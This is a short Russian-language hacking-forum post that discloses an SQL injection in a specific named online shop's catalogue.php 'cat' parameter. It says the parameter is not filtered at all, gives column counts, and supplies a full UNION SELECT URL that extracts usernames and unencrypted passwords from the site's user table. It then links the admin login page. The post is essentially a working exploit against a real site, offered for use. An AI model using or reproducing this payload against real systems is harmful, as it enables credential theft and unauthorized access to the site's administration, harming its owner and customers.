SQL-инъекция с доступом в user и с незашифренными пасами.
Уязвимость в catalogue.php , переменная cat, фильтрации никакой нет. Колличество столбцов 33,32 или 2.
http://www.the123d.com/shop/catalogue.php?cat=- 21+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32+from+user/* Админка: http://www.the123d.com/shop/admin/login.php
©Ky3bMu4
©http://forum.web-hack.ru